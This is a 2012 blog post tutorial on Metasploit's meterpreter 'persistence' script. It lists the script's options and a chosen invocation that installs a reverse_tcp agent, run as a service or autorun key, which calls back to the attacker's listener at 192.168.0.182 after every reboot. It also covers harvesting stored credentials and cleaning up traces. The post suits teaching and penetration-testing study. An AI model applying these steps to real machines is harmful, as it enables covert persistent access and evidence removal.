Tuesday, 20 March 2012

Owned for ever


Some days ago I read something about the meterpreter modules that one can execute once a machine has been compromised, but I can't remember where. So I want to talk about the use of some of them.

First of all, there are a lot of scripts to run (about 180), and they let us do things such as collecting the credentials stored in the system or in the installed software.

There are other things one can do, and one of them is making our connection persistent, so that the channel is kept for future connections. For that we use the "persistence" script. To see the options it has, run "run persistence -h":

Using that script we install an agent on the compromised machine that is started again every time the server reboots: as a Windows service (with -S), or through an autorun registry key (with -X for the machine, -U for the current user).

To explain how it works, we need to know its options:

-A Automatically start a matching multi/handler to connect to the agent
-L Location in target host where to write payload to, if none %TEMP% will be used.
-P Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back

I will use the options "-A", "-S", "-X", "-p 4445" and "-r 192.168.0.182". As we can see in the following image, a new session has been created, and we can also see where the VBS script has been stored and that it has been executed with a new process ID (PID).

To check that the channel is really persistent, reboot the owned computer: the active sessions die, and once the machine has come back up the agent tries to connect back to our multi/handler. The handler has to be listening on the same port with the same payload; if the one started by -A is no longer running, start exploit/multi/handler again with the matching LHOST and LPORT before rebooting.


To clean up our traces we must delete the files that were created, remove the autorun entry or service, and kill the running process. The first time the "persistence" script runs it writes a cleanup script to /root/.msf4/logs/persistence/*.rc. Before using it we have to change the PID in that script (after the reboot the agent runs under a new PID, which "getpid" shows in the new session) and move the kill command to the end: if it runs before the other commands, the connection dies and it is no longer possible to delete the registry key.

Finally, run the "resource" command from meterpreter to execute the cleanup script.

The resource command may report some errors. The only acceptable ones are the failure to delete the payload file (if we did not change the path with -L, the script lives in the %TEMP% directory and may no longer exist at that path after the reboot) and the failure to kill the process, because the process from before the reboot no longer exists. Note that Windows does not clear %TEMP% on reboot by default, so do not rely on that: if the rm fails, check the directory from the new session and delete the file by hand.
